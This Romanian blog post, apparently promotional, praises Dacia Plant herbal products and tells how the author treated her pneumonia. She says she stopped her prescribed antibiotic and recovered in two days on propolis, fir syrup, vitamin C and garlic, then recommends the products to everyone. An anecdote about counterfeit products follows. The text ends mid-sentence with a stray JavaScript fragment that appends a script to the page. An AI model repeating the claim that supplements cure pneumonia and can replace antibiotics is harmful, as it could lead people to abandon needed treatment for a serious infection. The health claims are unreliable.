produse dacia plant

produse dacia plant

Produsele Dacia Plant imi sunt dragi din mai multe motive. Cand am avut problem de sanatate am avut nevoie de medicamente alopate, le-am cumparat, nu si-au facut efectul, am luat de la plafar produse Dacia Plant, adica Vitamina C, sirop de brad si catina, si un fel de propolis, iar dupa cateva zile eram din nou pe picioare. Cam asta fac produsele Dacia Plant de la Pronapic.

Nu sunt adepta medicamentelor, mai ales a antibioticelor, luate asa, doar pentru ca doctorul nu vede o alta solutie, insa cand mi s-a pus diagnosticul de pneumonie, am zis clar ca trebuie sa le iau, fie ca imi place, fie ca nu. Am luat o zi, doua, trei, insa nu vedeam niciun efect imbucurator. Atunci am decis sa cumpar alte produse, cele alternative, cele naturiste. Am luat produsele de la Dacia Plant, pe care mi le recomandase chiar mama, care, intamplator, este si ea medic. Ea consuma astfel de produse pentru ca are incredere in ele.

Produsele Dacia Plant au punct de desfacere chiar in depozit

Produsele Dacia Plant pot fi achizitionate chiar din depozitul lor din Brasov, dar au si depozite in orasele mari din tara, tocmai pentru cei care nu vor sa le cumpere din farmacii, unde se pune si adaosul de 20 sau 30 la suta.  Am vazut preturi ale produselor Dacia Plant cu o data si jumatate mai mari in anumite lanturi de farmacii, nu o sa dau nume. Insa am ramas uimita sa vad o diferenta atat de mare intre preturi.

Cum spuneam, am avut nevoie de siropul de brad si de Vitamina C, insa ceea ce cred eu ca  m-a sculat din morti, a fost propolisul acela special, care pur si simplu mi-a curatat plamanii. Am incetat sa mai iau acel antibiotic, cand am inceput sa iau produsele naturiste. Si-au facut efectul in doua zile, deja ina  treia zi eram alt om. Le recomand cu toata increderea tuturor.

Sunt sigura ca daca mergeam pe variana antibioticelor stateam in casa, bolnava, cel putin doua saptamani. Pana isi afceau efectul antibioticele, trecea mult si bine. Am combinat produsele Dacia Plant cu usturoiul. Evident ca era un miros foarte interesant la noi in casa dimineata inainte sa deschid geamurile, insa stiu foarte clar ca asta mi-a facut bine.

Produse Dacia Plant contrafacute

Nu mi-a venit sa cred cand mi-a spus mama ca intr-o farmacie, culmea, de la piciorul blocului nostru, a gasit o cutie de pastile de Vitamina C cu catina, insa nu era cea pe care o stia ea. Ea consuma aproape zilnic produsul asta, si ii cunoaste cutia, aspectul… Mi-a spus ca acel produs nu era cel autentic. Am intrebat la farmacista de unde are acel produs, nici nu stia… A venit (dupa spusele ei) odata cu alte produse naturiste, insa distribuitorul nu era unul cunoscut, ci unul nou, o persoana pe care nu o mai vazuse nimeni pana atunci.   Mie mi-a fost clar ca produsele Dacia Plant pe care le adusese acel om nu erau cele bune, ci unele contrafacute.d.getElementsByTagName(‘head’)[0].appendChild(s);